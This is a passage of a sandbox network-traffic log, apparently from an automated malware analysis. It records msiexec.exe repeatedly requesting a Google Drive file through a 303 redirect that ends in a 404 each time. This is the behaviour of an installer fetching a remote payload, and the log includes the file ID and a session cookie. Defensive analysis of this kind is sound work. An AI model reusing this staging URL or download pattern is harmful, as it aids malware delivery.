                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:06 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="S6-_HSkw8YZM2nJWu60ibA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              14 | 192.168.2.8 | 49723 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:07 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:07 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:07 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: script-src 'nonce-nWv8uOQV_ofQ7-nN6CLaqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              15 | 192.168.2.8 | 49724 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:08 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:08 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC6L1Otzde4zST6UBMOkjq93vnrVojAnxa30fYbeG4c4ggJ2aeTqi23Ev95Zeb1MMkpB8gRAWlE
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:08 GMT
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-PbB5PoVftRiMW_YS3Qqfog' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:08 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="e2cSBf44YAiJQwDgfT-UJQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              16 | 192.168.2.8 | 49725 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:09 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:10 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:10 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-51VJgNRq200pZVTl7zUPuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              17 | 192.168.2.8 | 49726 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:10 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:11 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgTYEdbnO0Ao-2W0BCwAyqt0AgKd8ZMhAjfVy6vafgOMO19eymXO0mPW5P3eeLQ3ren3
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:11 GMT
                                                              Content-Security-Policy: script-src 'nonce-5ReVMcLKSnI00rHcgXEKcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:11 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="O4iSvb67GakrZDWBI-ZQaw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              18 | 192.168.2.8 | 49727 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:12 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:12 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:12 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-0kGUV4S16nOi9hCyD7xKrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              19 | 192.168.2.8 | 49728 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:13 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:13 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgSd8evy-nKqm5OnXVOEwkl-h2Wog7HKKgXrnepq2Hektu7_Qe5nasDRrSlGLn1fH-2-
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:13 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-KL_ThV4n1YVTSP0R_vdcdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:13 UTC  1652               IN
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BHJVwke_po1w_0HzbmIQzw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              20          192.168.2.8  49729        216.58.206.46   443               2160  C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp                Bytes transferred  Direction  Data
                                                              2025-01-10 23:02:14 UTC  418                OUT        GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:14 UTC  1920               IN         HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:14 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-tbyiSE0YIcfsR9rbmwXkUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              21          192.168.2.8  49730        172.217.16.193  443               2160  C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp                Bytes transferred  Direction  Data
                                                              2025-01-10 23:02:15 UTC  460                OUT        GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:16 UTC  1851               IN         HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC4eIlwszR7WgQLFMAkwKL62kM_uJ1airFXq4UPHkwQtxywnj-Hm1dnggPgE5P0GUoYPIkhjZ_4
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:15 GMT
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: script-src 'nonce-HYysF1XtdZs9QqezX6LoXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:16 UTC  1652               IN
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sPlzKsKZQgiMrdiNqOcQOw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              22          192.168.2.8  49731        216.58.206.46   443               2160  C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp                Bytes transferred  Direction  Data
                                                              2025-01-10 23:02:16 UTC  418                OUT        GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:17 UTC  1920               IN         HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:17 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
